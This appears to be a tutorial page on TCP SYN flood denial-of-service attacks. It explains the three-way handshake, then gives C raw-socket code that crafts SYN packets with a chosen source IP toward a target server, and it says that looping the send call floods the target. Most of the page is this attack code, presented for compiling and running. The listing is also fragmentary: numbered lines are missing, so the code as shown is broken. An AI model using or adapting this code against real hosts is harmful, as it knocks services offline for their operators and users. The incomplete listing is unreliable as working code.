TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :
1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server
The above 3 steps are followed to establish a connection between source and destination.
SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.
Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.
For more information on TCP Syn DOS attack read up rfc 4987 , titled “TCP SYN Flooding Attacks and Common Mitigations”
over here
Below is an example code in c :
Code
5 | #include<string.h> //memset |
7 | #include<stdlib.h> //for exit(0); |
8 | #include<errno.h> //For errno - the error number |
9 | #include<netinet/tcp.h> //Provides declarations for tcp header |
10 | #include<netinet/ip.h> //Provides declarations for ip header |
14 | unsigned int source_address; |
15 | unsigned int dest_address; |
16 | unsigned char placeholder; |
17 | unsigned char protocol; |
18 | unsigned short tcp_length; |
23 | unsigned short csum(unsigned short *ptr, int nbytes) { |
25 | unsigned short oddbyte; |
26 | register short answer; |
35 | *((u_char*)&oddbyte)=*(u_char*)ptr; |
39 | sum = (sum>>16)+(sum & 0xffff); |
40 | sum = sum + (sum>>16); |
49 | int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); |
51 | char datagram[4096] , source_ip[32]; |
53 | struct iphdr *iph = ( struct iphdr *) datagram; |
55 | struct tcphdr *tcph = ( struct tcphdr *) (datagram + sizeof ( struct ip)); |
56 | struct sockaddr_in sin ; |
57 | struct pseudo_header psh; |
59 | strcpy (source_ip , "192.168.1.2" ); |
61 | sin .sin_family = AF_INET; |
62 | sin .sin_port = htons(80); |
63 | sin .sin_addr.s_addr = inet_addr ( "1.2.3.4" ); |
65 | memset (datagram, 0, 4096); |
71 | iph->tot_len = sizeof ( struct ip) + sizeof ( struct tcphdr); |
72 | iph->id = htonl (54321); |
75 | iph->protocol = IPPROTO_TCP; |
77 | iph->saddr = inet_addr ( source_ip ); |
78 | iph->daddr = sin .sin_addr.s_addr; |
80 | iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); |
83 | tcph->source = htons (1234); |
84 | tcph->dest = htons (80); |
94 | tcph->window = htons (5840); |
100 | psh.source_address = inet_addr( source_ip ); |
101 | psh.dest_address = sin .sin_addr.s_addr; |
103 | psh.protocol = IPPROTO_TCP; |
104 | psh.tcp_length = htons(20); |
106 | memcpy (&psh.tcp , tcph , sizeof ( struct tcphdr)); |
108 | tcph->check = csum( (unsigned short *) &psh , sizeof ( struct pseudo_header)); |
112 | const int *val = &one; |
113 | if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) |
115 | printf ( "Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror ( errno )); |
127 | ( struct sockaddr *) & sin , |
135 | printf ( "Packet Send \n" ); |
Compile and Run
On Ubuntu
Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.